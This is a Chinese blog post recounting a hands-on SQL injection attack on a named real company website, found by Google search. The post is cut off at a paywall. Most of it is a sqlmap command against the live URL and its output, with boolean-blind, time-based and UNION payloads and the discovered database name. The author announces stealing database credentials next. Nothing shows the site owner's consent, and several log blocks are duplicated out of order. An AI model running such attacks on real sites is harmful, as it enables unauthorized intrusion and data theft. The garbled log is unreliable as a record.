本文介绍了通过SQL注入攻破网站的经历,以http://www.konzern.com.cn/about/index.php?id=2为例,展示了利用sqlmap工具进行测试和确定数据库的过程。
1、之前也是google关键字搜索,找到了一个相对有点难度的网站http://www.konzern.com.cn/about/index.php?id=2
2、测试什么的就不用说了,直接sqlmap跑起来。
(1)先看看是什么数据库吧,废话,不是已经剧透了吗。
c:\Python27\sqlmap>sqlmap.py -u http://www.konzern.com.cn/about/index.php?id=2 --dbs
_
___ ___| |_____ ___ ___ {1.0.6.66#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:37:26
[11:37:26] [INFO] resuming back-end DBMS 'mysql'
[11:37:26] [INFO] testing connection to the target URL
[11:37:27] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 4222=4222
[11:37:26] [INFO] testing connection to the target URL
[11:37:27] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 4222=4222
Type: AND/OR time-based blind
Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
Payload: id=1 AND 8220=BENCHMARK(5000000,MD5(0x58466d44))
Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
Payload: id=1 AND 8220=BENCHMARK(5000000,MD5(0x58466d44))
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=-7699 UNION ALL SELECT CONCAT(0x7170717071,0x65665577634e784367596844557554664e6e45757947745955615469565a4741437167627648536c,0x7176766b71),NULL-- wfqe
---
[11:37:27] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.9
back-end DBMS: MySQL <= 5.0.11
[11:37:27] [INFO] fetching database names
[11:37:27] [WARNING] the SQL query provided does not return any output
[11:37:27] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[11:37:27] [INFO] fetching number of databases
[11:37:27] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:37:27] [INFO] retrieved:
[11:37:31] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[11:37:51] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[11:37:52] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions
Title: Generic UNION query (NULL) - 2 columns
Payload: id=-7699 UNION ALL SELECT CONCAT(0x7170717071,0x65665577634e784367596844557554664e6e45757947745955615469565a4741437167627648536c,0x7176766b71),NULL-- wfqe
---
[11:37:27] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.9
back-end DBMS: MySQL <= 5.0.11
[11:37:27] [INFO] fetching database names
[11:37:27] [WARNING] the SQL query provided does not return any output
[11:37:27] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[11:37:27] [INFO] fetching number of databases
[11:37:27] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:37:27] [INFO] retrieved:
[11:37:31] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[11:37:51] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[11:37:52] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions
[11:37:52] [ERROR] unable to retrieve the number of databases
[11:37:52] [INFO] falling back to current database
[11:37:52] [INFO] fetching current database
available databases [1]:
[*] kg
[11:37:52] [INFO] falling back to current database
[11:37:52] [INFO] fetching current database
available databases [1]:
[*] kg
[11:37:52] [INFO] fetched data logged to text files under 'C:\Users\jlz\.sqlmap\output\www.konzern.com.cn'
[*] shutting down at 11:37:52
结果显示数据库是mysql,数据库名kg,杜兰特的缩写,尼玛这开发是球迷吗,不过杜兰特去了勇士,这一选择,作为男人有点抱大腿,不过也是有苦衷吧,今年西部总决赛第七场,一个队友3米内没人不敢投,气的杜兰特吼。
(2)既然是mysql就先拿到数据库用户名和密码呗
c:\Python27\sqlmap>s
最低0.47元/天 解锁文章
扫一扫
4658
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
